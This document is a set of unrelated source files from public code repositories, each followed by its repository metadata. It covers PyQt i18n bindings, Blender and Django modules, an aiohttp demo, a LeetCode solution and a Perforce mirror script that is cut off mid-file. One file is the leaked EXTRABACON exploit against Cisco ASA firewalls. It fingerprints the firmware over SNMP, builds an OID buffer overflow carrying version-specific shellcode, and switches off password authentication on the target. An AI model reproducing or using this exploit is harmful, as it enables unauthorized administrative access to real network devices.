__all__ = ['tunel', 'tunel_pool']
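# A minimal usage sketch (illustrative ids):
#   pool = tunel_pool()
#   pool.join_tn('t1')           # creates tunel 't1' with cnt == 1
#   pool.ch_tn('t1', 't2')       # moves one member from 't1' to 't2'; empty 't1' is dropped
#   pool.chname_tn('t2', 'ops')  # renames 't2'; 't0' can never be renamed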
|
laxect/tellnet
|
tunel_struct.py
|
Python
|
lgpl-3.0
| 990
|
#!/usr/bin/env python3
import math
import os
import random
import re
import sys
# Complete the isBalanced function below.
def isBalanced(s):
opn = []
enc = []
enclosing = False
for c in s:
if '{' == c or '[' == c or '(' == c:
opn.append(c)
enclosing = False
elif '}' == c or ']' == c or ')' == c:
enc.append(c)
enclosing = True
if enclosing and len(opn) > 0 and len(enc) > 0:
            t = opn[-1]
            if (t == '{' and c == '}') or (t == '[' and c == ']') or (t == '(' and c == ')'):
opn.pop()
enc.pop()
return 'NO' if opn or enc else 'YES'
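# Examples: isBalanced('{[()]}') -> 'YES'; isBalanced('{[(])}') -> 'NO'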
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
t = int(input())
for t_itr in range(t):
s = input()
result = isBalanced(s)
fptr.write(result + '\n')
fptr.close()
|
williamlagos/chess
|
solving/stacks/brackets.py
|
Python
|
lgpl-3.0
| 905
|
# Copyright (c) 2015 Ultimaker B.V.
# Uranium is released under the terms of the LGPLv3 or higher.
import inspect
from PyQt5.QtCore import pyqtProperty, pyqtSignal, QObject, QUrl, QCoreApplication, pyqtSlot
from PyQt5.QtQml import QJSValue
# from UM.FlameProfiler import pyqtSlot
from UM.i18n import i18nCatalog
class i18nCatalogProxy(QObject): # [CodeStyle: Ultimaker code style requires classes to start with a upper case. But i18n is lower case by convention.]
def __init__(self, parent = None):
super().__init__()
self._name = None
self._catalog = None
# Slightly hacky way of getting at the QML engine defined by QtApplication.
engine = QCoreApplication.instance()._engine
self._i18n_function = self._wrapFunction(engine, self, self._call_i18n)
self._i18nc_function = self._wrapFunction(engine, self, self._call_i18nc)
self._i18np_function = self._wrapFunction(engine, self, self._call_i18np)
self._i18ncp_function = self._wrapFunction(engine, self, self._call_i18ncp)
    def setName(self, name):
        if name != self._name:
            self._name = name
            self._catalog = i18nCatalog(name)
            self.nameChanged.emit()
nameChanged = pyqtSignal()
@pyqtProperty(str, fset = setName, notify = nameChanged)
def name(self):
return self._name
@pyqtProperty(QJSValue, notify = nameChanged)
def i18n(self):
return self._i18n_function
@pyqtProperty(QJSValue, notify = nameChanged)
def i18nc(self):
return self._i18nc_function
@pyqtProperty(QJSValue, notify = nameChanged)
def i18np(self):
return self._i18np_function
@pyqtProperty(QJSValue, notify = nameChanged)
def i18ncp(self):
return self._i18ncp_function
@pyqtSlot(str, result = str)
def _call_i18n(self, message):
return self._catalog.i18n(message)
@pyqtSlot(str, str, result = str)
def _call_i18nc(self, context, message):
return self._catalog.i18nc(context, message)
@pyqtSlot(str, str, int, result = str)
def _call_i18np(self, single, multiple, counter):
return self._catalog.i18np(single, multiple, counter)
@pyqtSlot(str, str, str, int, result = str)
def _call_i18ncp(self, context, single, multiple, counter):
return self._catalog.i18ncp(context, single, multiple, counter)
## Wrap a function in a bit of a javascript to re-trigger a method call on signal emit.
#
# This slightly magical method wraps a Python method exposed to QML in a JavaScript
# closure with the same signature as the Python method. This allows the closure to be
# exposed as a QML property instead of a QML slot. Using a property for this allows us
# to add a notify signal to re-trigger the method execution. Due to the way notify
# signals are handled by QML, re-triggering the method only needs a signal emit.
#
# \param engine \type{QQmlEngine} The QML engine to use to evaluate JavaScript.
# \param this_object \type{QObject} The object to call the function on.
# \param function \type{Function} The function to call. Should be marked as pyqtSlot.
#
# \return \type{QJSValue} A JavaScript closure that, when called, calls the wrapped Python method.
#
# \note Currently, only functions taking a fixed list of positional arguments are supported.
#
# \todo Move this to a more generic place so more things can use it.
def _wrapFunction(self, engine, this_object, function):
# JavaScript code that wraps the Python method call in a closure
wrap_js = """function(this_object) {{
return function({args}) {{ return this_object.{function}({args}) }}
}}"""
# Get the function name and argument list.
function_name = function.__name__
function_args = inspect.getargspec(function)[0]
if function_args[0] == "self":
function_args = function_args[1:] # Drop "self" from argument list
# Replace arguments and function name with the proper values.
wrapped_function = wrap_js.format(function = function_name, args = ", ".join(function_args))
# Wrap the "this" object in a QML JSValue object.
this_jsvalue = engine.newQObject(this_object)
# Use the QML engine to evaluate the wrapped JS, then call that to retrieve the closure.
result = engine.evaluate(wrapped_function).call([this_jsvalue])
# Finally, return the resulting function.
return result
|
thopiekar/Uranium
|
UM/Qt/Bindings/i18nCatalogProxy.py
|
Python
|
lgpl-3.0
| 4,546
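To make the _wrapFunction trick above concrete, here is a dependency-free sketch of the JavaScript source it generates; no PyQt is required, and the stand-in slot is ours:
import inspect

wrap_js = """function(this_object) {{
    return function({args}) {{ return this_object.{function}({args}) }}
}}"""

def _call_i18nc(self, context, message):   # stand-in for the real pyqtSlot
    pass

args = inspect.getfullargspec(_call_i18nc).args[1:]   # drop "self"
print(wrap_js.format(function=_call_i18nc.__name__, args=", ".join(args)))
# Prints:
# function(this_object) {
#     return function(context, message) { return this_object._call_i18nc(context, message) }
# }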
|
# BlenderBIM Add-on - OpenBIM Blender Add-on
# Copyright (C) 2020, 2021 Dion Moult <dion@thinkmoult.com>
#
# This file is part of BlenderBIM Add-on.
#
# BlenderBIM Add-on is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# BlenderBIM Add-on is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with BlenderBIM Add-on. If not, see <http://www.gnu.org/licenses/>.
from bpy.types import Panel, UIList, Mesh
from blenderbim.bim.ifc import IfcStore
from ifcopenshell.api.layer.data import Data
class BIM_PT_layers(Panel):
bl_label = "IFC Presentation Layers"
bl_idname = "BIM_PT_layers"
bl_options = {"DEFAULT_CLOSED"}
bl_space_type = "PROPERTIES"
bl_region_type = "WINDOW"
bl_context = "scene"
bl_parent_id = "BIM_PT_geometry_object"
@classmethod
def poll(cls, context):
return IfcStore.get_file()
def draw(self, context):
if not Data.is_loaded:
Data.load(IfcStore.get_file())
self.props = context.scene.BIMLayerProperties
row = self.layout.row(align=True)
row.label(text="{} Layers Found".format(len(Data.layers.keys())))
if self.props.is_editing:
row.operator("bim.add_presentation_layer", text="", icon="ADD")
row.operator("bim.disable_layer_editing_ui", text="", icon="CANCEL")
else:
row.operator("bim.load_layers", text="", icon="GREASEPENCIL")
if self.props.is_editing:
self.layout.template_list(
"BIM_UL_layers",
"",
self.props,
"layers",
self.props,
"active_layer_index",
)
if self.props.active_layer_id:
self.draw_editable_ui(context)
def draw_editable_ui(self, context):
for attribute in self.props.layer_attributes:
row = self.layout.row(align=True)
row.prop(attribute, "string_value", text=attribute.name)
if attribute.is_optional:
row.prop(attribute, "is_null", icon="RADIOBUT_OFF" if attribute.is_null else "RADIOBUT_ON", text="")
class BIM_UL_layers(UIList):
def draw_item(self, context, layout, data, item, icon, active_data, active_propname):
if item:
row = layout.row(align=True)
row.label(text=item.name)
if context.active_object and isinstance(context.active_object.data, Mesh):
mprops = context.active_object.data.BIMMeshProperties
if (
mprops.ifc_definition_id in Data.items
and item.ifc_definition_id in Data.items[mprops.ifc_definition_id]
):
op = row.operator("bim.unassign_presentation_layer", text="", icon="KEYFRAME_HLT", emboss=False)
op.layer = item.ifc_definition_id
else:
op = row.operator("bim.assign_presentation_layer", text="", icon="KEYFRAME", emboss=False)
op.layer = item.ifc_definition_id
row.operator("bim.disable_editing_layer", text="", icon="HIDE_OFF", emboss=False)
row.operator("bim.disable_editing_layer", text="", icon="FREEZE", emboss=False)
if context.scene.BIMLayerProperties.active_layer_id == item.ifc_definition_id:
row.operator("bim.edit_presentation_layer", text="", icon="CHECKMARK")
row.operator("bim.disable_editing_layer", text="", icon="CANCEL")
elif context.scene.BIMLayerProperties.active_layer_id:
row.operator("bim.remove_presentation_layer", text="", icon="X").layer = item.ifc_definition_id
else:
op = row.operator("bim.enable_editing_layer", text="", icon="GREASEPENCIL")
op.layer = item.ifc_definition_id
row.operator("bim.remove_presentation_layer", text="", icon="X").layer = item.ifc_definition_id
|
IfcOpenShell/IfcOpenShell
|
src/blenderbim/blenderbim/bim/module/layer/ui.py
|
Python
|
lgpl-3.0
| 4,363
|
from twisted.web import resource
from Tribler.Core.Modules.restapi.market.asks_bids_endpoint import AsksEndpoint, BidsEndpoint
from Tribler.Core.Modules.restapi.market.orders_endpoint import OrdersEndpoint
from Tribler.Core.Modules.restapi.market.transactions_endpoint import TransactionsEndpoint
class MarketEndpoint(resource.Resource):
"""
This class represents the root endpoint of the market community API where we trade reputation.
"""
def __init__(self, session):
resource.Resource.__init__(self)
self.session = session
child_handler_dict = {"asks": AsksEndpoint, "bids": BidsEndpoint, "transactions": TransactionsEndpoint,
"orders": OrdersEndpoint}
for path, child_cls in child_handler_dict.iteritems():
self.putChild(path, child_cls(self.session))
|
vandenheuvel/tribler
|
Tribler/Core/Modules/restapi/market_endpoint.py
|
Python
|
lgpl-3.0
| 851
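A sketch of how such a Twisted root resource is typically served; the endpoint class, path, and port here are placeholders and are not taken from Tribler:
from twisted.internet import reactor
from twisted.web import resource, server

class PingEndpoint(resource.Resource):
    isLeaf = True
    def render_GET(self, request):
        return b"pong"

root = resource.Resource()
root.putChild(b"ping", PingEndpoint())       # same putChild pattern as above
reactor.listenTCP(8085, server.Site(root))   # hypothetical port
reactor.run()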
|
#!/usr/bin/env python
import sys
import string
import subprocess
import binascii
import random
import datetime
sc_dir = "./shellcode"
vers_dir = "./versions"
sys.path.insert(0, '..')
from Mexeggs.all import *
from Mexeggs import *
from scapy.all import *
##
##
##
class ExtrabaconInfoSubcommand(sploit.InfoSubcommand):
expect_filename_argument = False ##
def setup_parser(self, parser):
super(ExtrabaconInfoSubcommand, self).setup_parser(parser)
self.parser = parser
##
for a in self.parser._actions:
if a.dest == "version":
a.choices = ['v2c']
a.help = 'SNMP version (v2c only)'
def run(self, exp):
super(ExtrabaconInfoSubcommand, self).run(exp)
##
##
##
##
class ExtrabaconExecSubcommand(sploit.ExecSubcommand):
expect_filename_argument = False ##
def setup_parser(self, parser):
super(ExtrabaconExecSubcommand, self).setup_parser(parser)
self.parser = parser
##
for a in self.parser._actions:
if a.dest == "version":
a.choices = ['v2c']
a.help = 'SNMP version (v2c only)'
self.parser.add_argument('--mode',
help='select mode of operation',
choices=["pass-disable", "pass-enable"],
required=True,
default=None)
self.parser.add_argument('--msg',
help='print success message on console of target (DO NOT USE)',
dest='msg',
action='store_true',
required=False,
default=False)
def run(self, exp):
super(ExtrabaconExecSubcommand, self).run(exp)
class Extrabacon(Sploit):
def setup_parser(self):
super(Extrabacon, self).setup_parser()
##
self.add_subcommand(ExtrabaconInfoSubcommand())
##
self.add_subcommand(ExtrabaconExecSubcommand())
##
##
def generate_touch(self):
return SNMP(version = self.params.version,
community = self.params.community,
PDU = SNMPget(varbindlist = [SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.1.0')),
SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.3.0')),
SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.5.0'))]))
def fw_version_check(self, vers_string):
##
##
##
##
##
##
##
##
##
##
##
##
##
##
if vers_string == "Cisco Adaptive Security Appliance Version 8.0(2)":
return "asa802"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.0(3)":
return "asa803"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.0(3)6":
return "asa803-6"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.0(4)":
return "asa804"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.0(4)32":
return "asa804-32"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.0(5)":
return "asa805"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.2(1)":
return "asa821"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.2(2)":
return "asa822"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.2(3)":
return "asa823"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.2(4)":
return "asa824"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.2(5)":
return "asa825"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.3(1)":
return "asa831"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.3(2)":
return "asa832"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.4(1)":
return "asa841"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.4(2)":
return "asa842"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.4(3)":
return "asa843"
elif vers_string == "Cisco Adaptive Security Appliance Version 8.4(4)":
return "asa844"
else:
return "unsupported"
##
##
##
def generate_runtime(self):
try:
f = open("%s/runtime.s" % vers_dir, 'w')
f.write("# this file auto-generated, do not touch\n")
f.write("\n")
f.write(".set commstr_len, %d\n" % len(self.params.community))
f.close()
except:
print "problem generating runtime.s file in versions!"
print sys.exc_info()[0]
sys.exit(1)
def post_touch(self, response):
##
##
values = [x[SNMPvarbind].value.val for x in SNMP(response)[SNMP][SNMPresponse].varbindlist]
if not values:
return False
##
snmp = SNMP(response)
print "[+] response:"
snmp.show()
fw_uptime = values[1]
fw_uptime_str = str(datetime.timedelta(seconds=fw_uptime/100))
print
print "[+] firewall uptime is %d time ticks, or %s" % (fw_uptime, fw_uptime_str)
print
fw_name = values[2]
print "[+] firewall name is %s" % fw_name
print
fw_vers = self.fw_version_check(values[0])
if fw_vers != "unsupported":
print "[+] target is running %s, which is supported" % fw_vers
else:
print "[-] target is running %s, which is NOT supported" % values[0]
self.key_data = fw_vers ##
if self.params.verbose:
print 'Data stored in key file : %s' % self.key_data
##
##
return True
def load_vinfo(self):
self.vinfo = self.key_data.upper()
if self.params.verbose:
print 'Data stored in self.vinfo: %s' % self.vinfo
def report_key(self, key):
print "\nTo check the key file to see if it really contains what we're claiming:"
print "# cat %s" % self.get_key_file(key = key)
if self.key_data.lower() == "unsupported":
return
print "\nTo disable password checking on target:"
print "# %s exec -k %s %s --mode pass-disable" % (self.env.progname, key, " ".join(self.params.args[2:]))
print "\nTo enable password checking on target:"
print "# %s exec -k %s %s --mode pass-enable" % (self.env.progname, key, " ".join(self.params.args[2:]))
##
##
##
print
##
##
##
def build_shellcode(self):
try:
print "[+] ==============="
subp = subprocess.Popen("make %s" % self.key_data.lower(),
cwd=sc_dir,
shell=True)
retval = subp.wait()
print "[+] ==============="
except OSError, e:
print "problem (OSError) generating %s %s shellcode" % (self.key_data.lower(), modes[self.params.mode])
print "OSError: " + str(e)
sys.exit(1)
except Exception, e:
print "problem (Exception) generating %s %s shellcode" % (self.key_data.lower(), modes[self.params.mode])
print str(e)
sys.exit(1)
if retval != 0:
print "problem with generating shellcode"
return False
return True
##
##
##
def build_payload(self, sc):
payload = ""
if self.params.mode == "pass-disable":
payload += sc.payload_PMCHECK_DISABLE_byte
print "appended PMCHECK_DISABLE payload " + binascii.hexlify(sc.payload_PMCHECK_DISABLE_byte)
payload += sc.payload_AAAADMINAUTH_DISABLE_byte
print "appended AAAADMINAUTH_DISABLE payload " + binascii.hexlify(sc.payload_AAAADMINAUTH_DISABLE_byte)
elif self.params.mode == "pass-enable":
payload += sc.payload_PMCHECK_ENABLE_byte
print "appended PMCHECK_ENABLE payload " + binascii.hexlify(sc.payload_PMCHECK_ENABLE_byte)
payload += sc.payload_AAAADMINAUTH_ENABLE_byte
print "appended AAAADMINAUTH_ENABLE payload " + binascii.hexlify(sc.payload_AAAADMINAUTH_ENABLE_byte)
else:
return None ##
payload += "\xc3" ##
return payload
def generate_exploit(self):
##
if not self.params.mode:
print "[-] no mode selected!"
sys.exit(1)
print "[+] generating exploit for exec mode %s" % self.params.mode
if self.key_data.lower() == "unsupported":
print "[-] unsupported target version, abort"
sys.exit(1)
if os.path.exists(sc_dir):
print "[-] building shellcode in %s" % sc_dir
sys.path.insert(0, sc_dir)
print "[+] calling make on shellcode for target version"
if not self.build_shellcode():
print "[-] problem building shellcode"
sys.exit(1)
elif os.path.exists(vers_dir):
print "[+] using shellcode in %s" % vers_dir
sys.path.insert(0, vers_dir)
else:
print "[-] cannot find %s or %s" % (sc_dir, vers_dir)
sys.exit(1)
self.sc_filename = "shellcode_%s" % self.key_data.lower()
print "[+] importing version-specific shellcode %s" % self.sc_filename
try:
sc = __import__(self.sc_filename)
except:
print "[-] problem importing version-specific shellcode from %s" % self.sc_filename
sys.exit(1)
##
##
##
##
head = '1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9'
head_len = len(head.split('.'))
##
##
##
##
##
wrapper = sc.preamble_snmp
if self.params.msg:
wrapper += "." + sc.successmsg_snmp
wrapper += "." + sc.launcher_snmp
wrapper += "." + sc.postscript_snmp
##
wrapper_len = len(wrapper.split('.'))
wrapper += ".144" * (82 - wrapper_len)
wrapper_len = len(wrapper.split('.'))
##
##
##
##
##
overflow = string.join([head, "95", wrapper, sc.my_ret_addr_snmp, sc.finder_snmp], ".")
overflow_len = head_len + 1 + wrapper_len + sc.my_ret_addr_len + sc.finder_len
##
##
##
##
if overflow_len != len(overflow.split('.')):
print "[-] problem with computed (%d) vs actual overflow len (%d)" % (overflow_len, len(overflow.split('.')))
sys.exit(1)
if overflow_len != 112:
print "[-] problem with overflow_len (%d != 112)" % overflow_len
sys.exit(1)
if head_len != 16:
print "[-] problem with head_len (%d != 16)" % head_len
sys.exit(1)
##
##
##
##
##
##
##
##
print "[+] building payload for mode %s" % self.params.mode
payload = self.build_payload(sc)
if not payload:
print "[-] problem building payload"
sys.exit(1)
self.params.request_id = random.randint(0x80000, 0x1fffffff)
print "[+] random SNMP request-id %d" % self.params.request_id
##
exba_msg = SNMP(version=self.params.version,
community=self.params.community,
PDU=SNMPbulk(id=ASN1_INTEGER(self.params.request_id),
max_repetitions=1,
varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.1.1"),
value=ASN1_STRING(payload)),
SNMPvarbind(oid=ASN1_OID(overflow)),
]
)
)
##
##
##
##
##
##
##
offset = exba_msg.__str__().find(payload)
print "[+] fixing offset to payload %d" % offset
overflow = string.replace(overflow, "4.1.255.208", ("4.%d.255.208" % offset), 1)
##
exba_msg = SNMP(version=self.params.version,
community=self.params.community,
PDU=SNMPbulk(id=ASN1_INTEGER(self.params.request_id),
max_repetitions=1,
varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.1.1"),
value=ASN1_STRING(payload)),
SNMPvarbind(oid=ASN1_OID(overflow)),
]
)
)
if self.params.verbose:
print "overflow (%d): %s" % (overflow_len, overflow)
print "payload (%d): %s" % (len(payload), binascii.hexlify(payload))
print "EXBA msg (%d): %s" % (len(exba_msg), binascii.hexlify(exba_msg[SNMP].__str__()))
##
if len(exba_msg) >= 512:
print "[-] final SNMP msg is too large (%d >= %d) abort" % (len(exba_msg), 512)
sys.exit(1)
##
##
##
ret_list = [exba_msg]
return(ret_list)
def post_exploit(self, response):
##
##
snmp = SNMP(response)
print "[+] response:"
snmp.show()
recv_id = int(snmp.PDU.id.val)
if recv_id == self.params.request_id:
print "[+] received SNMP id %d, matches random id sent, likely success" % recv_id
return True
else:
print "[-] received SNMP id %d, expecting %d, mismatch! This is probably bad" % (recv_id, self.params.request_id)
return False
if __name__ == '__main__':
exp = Extrabacon('Extrabacon', '1.1.0.1')
exp.launch(sys.argv)
|
DarthMaulware/EquationGroupLeaks
|
Leak #1 - Equation Group Cyber Weapons Auction - Invitation/EQGRP-Free-File/Firewall/EXPLOITS/EXBA/extrabacon_1.1.0.1.py
|
Python
|
unlicense
| 14,497
|
import asyncio
from aiohttp import web
async def handle(request):
index = open("index.html", 'rb')
content = index.read()
return web.Response(body=content, content_type='text/html')
async def wshandler(request):
app = request.app
ws = web.WebSocketResponse()
await ws.prepare(request)
app["sockets"].append(ws)
while 1:
msg = await ws.receive()
if msg.tp == web.MsgType.text:
print("Got message %s" % msg.data)
ws.send_str("Pressed key code: {}".format(msg.data))
elif msg.tp == web.MsgType.close or\
msg.tp == web.MsgType.error:
break
app["sockets"].remove(ws)
print("Closed connection")
return ws
async def game_loop(app):
while 1:
for ws in app["sockets"]:
ws.send_str("game loop says: tick")
await asyncio.sleep(2)
app = web.Application()
app["sockets"] = []
asyncio.ensure_future(game_loop(app))
app.router.add_route('GET', '/connect', wshandler)
app.router.add_route('GET', '/', handle)
web.run_app(app)
|
7WebPages/snakepit-game
|
simple/game_loop_basic.py
|
Python
|
unlicense
| 1,070
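The snippet above targets a pre-1.0 aiohttp (msg.tp, web.MsgType, synchronous send_str). A sketch of the same handler against aiohttp 3.x, assuming the app["sockets"] setup shown above:
from aiohttp import web, WSMsgType

async def wshandler(request):
    ws = web.WebSocketResponse()
    await ws.prepare(request)
    request.app["sockets"].append(ws)
    async for msg in ws:                     # iterates until close or error
        if msg.type == WSMsgType.TEXT:
            await ws.send_str("Pressed key code: {}".format(msg.data))
    request.app["sockets"].remove(ws)
    return ws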
|
from django.db import models
from django.conf import settings
from django.contrib.auth.models import User
class Profile(models.Model):
user = models.OneToOneField(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
date_of_birth = models.DateField(blank=True, null=True)
photo = models.ImageField(upload_to='users/%Y/%m/%d/', blank=True)
def __str__(self):
return 'Profile for user {}'.format(self.user.username)
class Contact(models.Model):
user_from = models.ForeignKey('auth.User', related_name='rel_from_set',
on_delete=models.CASCADE)
user_to = models.ForeignKey('auth.User', related_name='rel_to_set',
on_delete=models.CASCADE)
created = models.DateTimeField(auto_now_add=True, db_index=True)
class Meta:
ordering = ('-created', )
def __str__(self):
return '{} follows {}'.format(self.user_from, self.user_to)
User.add_to_class(
'following',
models.ManyToManyField(
'self',
through=Contact,
related_name='followers',
symmetrical=False
)
)
|
ch1huizong/dj
|
bookmarks/account/models.py
|
Python
|
unlicense
| 1,147
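A minimal usage sketch for the follow relation above; it assumes a configured Django project with migrations applied, and the usernames are illustrative:
from django.contrib.auth.models import User

alice = User.objects.create_user('alice')
bob = User.objects.create_user('bob')
Contact.objects.create(user_from=alice, user_to=bob)   # alice follows bob
assert bob in alice.following.all()
assert alice in bob.followers.all()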
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: fix_methodattrs.py
"""Fix bound method attributes (method.im_? -> method.__?__).
"""
from .. import fixer_base
from ..fixer_util import Name
MAP = {'im_func': '__func__',
'im_self': '__self__',
'im_class': '__self__.__class__'
}
class FixMethodattrs(fixer_base.BaseFix):
BM_compatible = True
PATTERN = "\n power< any+ trailer< '.' attr=('im_func' | 'im_self' | 'im_class') > any* >\n "
def transform(self, node, results):
attr = results['attr'][0]
new = unicode(MAP[attr.value])
attr.replace(Name(new, prefix=attr.prefix))
|
DarthMaulware/EquationGroupLeaks
|
Leak #5 - Lost In Translation/windows/Resources/Python/Core/Lib/lib2to3/fixes/fix_methodattrs.py
|
Python
|
unlicense
| 746
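A small demo of driving this fixer through lib2to3's refactoring machinery; the fixer module path is the standard one, while the input string is ours:
from lib2to3.refactor import RefactoringTool

rt = RefactoringTool(['lib2to3.fixes.fix_methodattrs'])
tree = rt.refactor_string("m.im_func\nm.im_self\nm.im_class\n", "<demo>")
print(tree)
# m.__func__
# m.__self__
# m.__self__.__class__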
|
#!/usr/bin/env python
from efl import evas
import unittest
class TestLineBasics(unittest.TestCase):
def setUp(self):
self.canvas = evas.Canvas(method="buffer",
size=(400, 500),
viewport=(0, 0, 400, 500))
self.canvas.engine_info_set(self.canvas.engine_info_get())
def tearDown(self):
self.canvas.delete()
del self.canvas
def testConstructor(self):
o = evas.Line(self.canvas, start=(10, 20), end=(30, 40))
self.assertEqual(type(o), evas.Line)
self.assertEqual(o.start_get(), (10, 20))
self.assertEqual(o.end_get(), (30, 40))
if __name__ == '__main__':
unittest.main(verbosity=2)
evas.shutdown()
|
maikodaraine/EnlightenmentUbuntu
|
bindings/python/python-efl/tests/evas/test_07_object_line.py
|
Python
|
unlicense
| 752
|
import unittest
from typing import List
import utils
# O(len(nums1) * len(nums2)) time. O(1) extra space. Brute force.
class Solution:
def nextGreaterElement(self, nums1: List[int], nums2: List[int]) -> List[int]:
result = []
for num in nums1:
index = nums2.index(num)
for i in range(index + 1, len(nums2)):
if nums2[i] > num:
result.append(nums2[i])
break
else:
result.append(-1)
return result
class Test(unittest.TestCase):
def test(self):
cases = utils.load_test_json(__file__).test_cases
for case in cases:
args = str(case.args)
actual = Solution().nextGreaterElement(**case.args.__dict__)
self.assertEqual(case.expected, actual, msg=args)
if __name__ == '__main__':
unittest.main()
|
chrisxue815/leetcode_python
|
problems/test_0496_brute_force.py
|
Python
|
unlicense
| 903
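The snippet above is the brute-force variant; for contrast, a monotone-stack sketch of the same problem in O(len(nums1) + len(nums2)) time (the function name and test case are ours):
from typing import List

def next_greater_element(nums1: List[int], nums2: List[int]) -> List[int]:
    next_greater = {}
    stack = []                      # values still waiting for a greater one
    for num in nums2:
        while stack and stack[-1] < num:
            next_greater[stack.pop()] = num
        stack.append(num)
    return [next_greater.get(num, -1) for num in nums1]

assert next_greater_element([4, 1, 2], [1, 3, 4, 2]) == [-1, 3, -1]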
|
#!/usr/bin/env python
# -*- Mode: Python; indent-tabs-mode: nil; tab-width: 4 -*-
# vi: set ts=4 sw=4 expandtab: (add to ~/.vimrc: set modeline modelines=5)
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
# Gist of the script flow:
# 1. read in what the last mirror point was from an external file
# 2. get a list of changes from p4 since that last change
# 3. in tamarin do a pull update (in the event there was a change outside of p4)
# 4. loop over the changes:
# a. sync to the change
# b. capture the p4 commit message, user, date and CL#
# c. rm everything in tamarin minus .hg/
# d. copy everything from p4 clientspace into tamarin MINUS tamarin-merge.txt
# e. hg commit using p4 message (append CL# to message), p4 user and p4 date if possible
# f. hg push this change (this will make sure that if there is another change available
# that for some reason bombs out, we have at least pushed to mozilla what we could)
# g. rewrite the external tracking file with this CL#
# h. if the push fails....
# Information on how to setup the host of this script can
# be found @ https://zerowing.corp.adobe.com/x/QwU5JQ
from __future__ import absolute_import, print_function
import os, marshal, sys, subprocess, shutil, tempfile
import datetime, pytz
from subprocess import Popen, PIPE
class P4Mirror():
# Required config information:
# tamarin-redux repo location
TAMARIN_REPO=os.getenv('TAMARIN_REPO')
LASTBUILD_FILE="lastbuild.txt"
P4ROOT=os.getenv('P4ROOT')
P4USER=os.getenv('P4USER')
P4CLIENT=os.getenv('P4CLIENT')
P4PORT=os.getenv('P4PORT')
P4AVMPLUS=os.getenv('P4AVMPLUS')
OLDHEAD=0
HEAD=0
script_dir="./"
env=os.environ
def __init__(self):
# Ensure that all necessary env variables have been configure
self.checkConfig()
self.log("Read in last mirror point")
self.getLastMirror()
self.log("\t%s\n" % self.OLDHEAD)
self.log("Get the current HEAD")
self.getCurrentHead()
self.log("\t%s\n" % self.HEAD)
self.log("Get changes from Perforce")
changes=self.getChanges()
self.log("Found %s changes to process..." % len(changes))
if len(changes) == 0:
sys.exit(0)
self.log("Sync the hg mirror repo")
self.syncHGRepo()
self.log("\n")
self.log("Process Changes")
self.processChanges(changes)
def checkConfig(self):
exit=False
# Ensure that all necessary env variables have been configure
if self.TAMARIN_REPO == None:
self.log("TAMARIN_REPO is not set")
exit=True
if self.LASTBUILD_FILE == None:
self.log("LASTBUILD_FILE is not set")
exit=True
if self.P4ROOT == None:
self.log("P4ROOT is not set")
exit=True
if self.P4USER == None:
self.log("P4USER is not set")
exit=True
if self.P4CLIENT == None:
self.log("P4CLIENT is not set")
exit=True
if self.P4PORT == None:
self.log("P4PORT is not set")
exit=True
if self.P4AVMPLUS == None:
self.log("P4AVMPLUS is not set")
exit=True
if exit:
sys.exit(1)
# Do a quick sanity check to make sure that self.TAMARIN_REPO/.hg/hgrc exists
# before we start deleting items from this location later in processChanges()
if not os.path.exists(self.TAMARIN_REPO+"/.hg/store"):
self.log("TAMARIN_REPO does not contain a proper mercurial repo")
self.log("TAMARIN_REPO: %s" % self.TAMARIN_REPO)
sys.exit(1)
if not os.path.exists(self.LASTBUILD_FILE):
self.log("LASTBUILD_FILE does not exist")
self.log("LASTBUILD_FILE: %s" % self.LASTBUILD_FILE)
sys.exit(1)
def getLastMirror(self):
# read last mirror changelist
bf=open(self.LASTBUILD_FILE, 'r')
for line in bf:
self.OLDHEAD = int(line)
bf.close()
def getCurrentHead(self):
stdout, stderr, exit = self.run_pipe(cmd="p4 counter change", env=self.env)
for line in stdout:
self.HEAD = int(line)
if stderr:
for line in stderr:
self.log(line)
if exit:
sys.exit(exit)
def getChanges(self):
changes = []
# Actually need to get all of the changes from OLDHEAD+1 to HEAD
cmd = "p4 -G changes -s submitted //%s/...@%s,%s" % (self.P4CLIENT, self.OLDHEAD+1, self.HEAD)
pipe = Popen( cmd.split(), stdout=PIPE).stdout
try: # The -G option on p4 returns a python object, so need to be loaded via marshal.load()
while 1:
record = marshal.load( pipe )
changes.append( record )
except EOFError:
pass
pipe.close()
# Need to loop backwards through this list as the latest changes is at the start
changes.reverse()
return changes
def syncHGRepo(self):
# Script being really paranoid about local changes....
cmd = "hg revert --all"
stdout, stderr, exit = self.run_pipe(cmd=cmd, cwd=self.TAMARIN_REPO, env=self.env)
for line in stdout:
self.log(line)
if stderr:
for line in stderr:
self.log(line)
if exit:
sys.exit(exit)
